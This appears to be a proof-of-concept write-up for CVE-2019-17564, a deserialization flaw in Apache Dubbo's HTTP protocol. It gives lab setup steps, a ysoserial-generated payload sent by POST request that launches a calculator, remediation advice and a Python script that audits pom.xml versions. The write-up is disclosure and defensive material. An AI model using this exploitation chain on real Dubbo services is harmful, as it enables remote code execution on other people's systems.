
CVE-2019-17564 PoC: Apache Dubbo security vulnerability

Associated vulnerability: Apache Dubbo security vulnerability (CVE-2019-17564)

Description: Apache Dubbo versions 2.7.0 through 2.7.4, 2.6.0 through 2.6.7 and 2.5.x contain a security vulnerability: once the HTTP protocol is enabled, Apache Dubbo handles the message body improperly. An attacker can exploit this to execute arbitrary code.
# CVE-2019-17564: Apache Dubbo deserialization vulnerability

# 0x00 Introduction
Apache Dubbo is a high-performance, lightweight open-source Java RPC framework. It provides three core capabilities: interface-oriented remote method invocation, intelligent fault tolerance and load balancing, and automatic service registration and discovery.

# 0x01 Vulnerability overview

Apache Dubbo supports several protocols; the Dubbo protocol is the officially recommended one. CVE-2019-17564 is a deserialization vulnerability in Apache Dubbo's HTTP protocol: once the HTTP protocol is enabled, Dubbo handles the request message body improperly and deserializes it unsafely. When a usable gadget chain is present on the project's classpath, this leads to remote code execution.

# 0x02 Affected versions

- 2.7.0 <= Apache Dubbo <= 2.7.4.1
- 2.6.0 <= Apache Dubbo <= 2.6.7
- Apache Dubbo 2.5.x

# 0x03 Environment setup

1、Dubbo needs ZooKeeper to start, so install ZooKeeper first
```
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
tar xzf zookeeper-3.4.10.tar.gz
# Rename zoo_sample.cfg in the conf directory to zoo.cfg
cd zookeeper-3.4.10/conf
mv zoo_sample.cfg zoo.cfg
# Start ZooKeeper from the bin directory
cd ../bin
./zkServer.sh start
```

![WX20200222-171524@2x.png](images/1582362955556-247e5369-38bc-4dd7-9167-2896586087e0.png)

2、Get the Dubbo samples project from GitHub and modify pom.xml
```
git clone https://github.com/apache/dubbo-samples
# Change into the dubbo-samples-http directory of the cloned tree and edit its pom.xml
vim pom.xml
```
Change the Dubbo version to a vulnerable one
![WX20200222-172028@2x.png](images/1582363259817-67193fdc-b8d6-4e1e-b408-0f5c80395bd7.png)
Add a dependency that brings in a triggerable gadget chain; here commons-collections4-4.0 is used

```
<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>
```

![WX20200222-172346@2x.png](images/1582363443997-28b7c2a6-6a30-4345-9e50-b597c89b3b4f.png)

3、Build with Maven and start Dubbo

```
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java
```

![WX20200222-172721@2x.png](images/1582363653872-922586de-47eb-4302-8824-46b3bccdab81.png)

# 0x04 Exploitation
Payload:

```
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

payload
```
The payload is generated with ysoserial

```
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser
```

Send the request with Burp Suite
![WX20200222-173202@2x.png](images/1582363937223-1aef120f-980c-44ef-b50b-4ea6c212aa64.png)

# 0x05 Remediation
1. Disable the HTTP protocol
2. Upgrade promptly to 2.7.5 or later; release notes: [https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5](https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5)
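
To check whether a project's declared Dubbo version falls inside the affected ranges listed in section 0x02 or already carries the 2.7.5+ fix, here is an added audit script (example code, not part of the original PoC). It assumes the usual Maven coordinates com.alibaba:dubbo (2.6.x and earlier) and org.apache.dubbo:dubbo (2.7.x), and a pom.xml whose version may be pulled from a `${property}`; the sample pom is constructed.

```python
import xml.etree.ElementTree as ET

NS = "{http://maven.apache.org/POM/4.0.0}"  # default namespace of a Maven pom

# Inclusive (lower, upper) bounds from section 0x02; the 2.5.x line is matched by prefix.
AFFECTED_RANGES = [((2, 7, 0), (2, 7, 4, 1)), ((2, 6, 0), (2, 6, 7))]

def parse_version(text):
    """'2.7.4.1' -> (2, 7, 4, 1); a '-SNAPSHOT' or '-RC1' qualifier is dropped."""
    core = text.strip().split("-")[0]
    return tuple(int(p) for p in core.split(".") if p.isdigit())

def is_affected(version):
    v = parse_version(version)
    if not v:  # unresolved ${placeholder} or garbage: report it rather than silently pass
        raise ValueError(f"unparseable Dubbo version: {version!r}")
    # Tuples compare element-wise, so (2, 7, 4) < (2, 7, 4, 1) and (2, 7, 5) falls outside.
    return v[:2] == (2, 5) or any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)

def dubbo_versions_in_pom(pom_xml):
    """Return the declared version of each Dubbo dependency, resolving ${property} references."""
    root = ET.fromstring(pom_xml)
    props = {}
    for node in root.findall(NS + "properties/*"):
        props[node.tag.replace(NS, "")] = (node.text or "").strip()
    versions = []
    for dep in root.iter(NS + "dependency"):
        group = dep.findtext(NS + "groupId", "")
        artifact = dep.findtext(NS + "artifactId", "")
        version = dep.findtext(NS + "version", "").strip()
        # Assumed coordinates: com.alibaba:dubbo (2.6.x and older), org.apache.dubbo:dubbo (2.7.x)
        if artifact == "dubbo" and group in ("org.apache.dubbo", "com.alibaba"):
            if version.startswith("${") and version.endswith("}"):
                version = props.get(version[2:-1], version)
            versions.append(version)
    return versions

def audit_pom(pom_xml):
    """Map every Dubbo version found in the pom to True (affected) or False (outside the ranges)."""
    return {v: is_affected(v) for v in dubbo_versions_in_pom(pom_xml)}

# Constructed sample pom (not from the write-up): namespaced root, version taken from <properties>.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><dubbo.version>2.7.3</dubbo.version></properties>
  <dependencies><dependency>
    <groupId>org.apache.dubbo</groupId><artifactId>dubbo</artifactId>
    <version>${dubbo.version}</version>
  </dependency></dependencies>
</project>"""
```

Run `audit_pom(open("pom.xml").read())` against a real project to get a per-version verdict; a `ValueError` means the version could not be resolved from the pom alone and needs a manual look.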

# References

[https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html](https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html)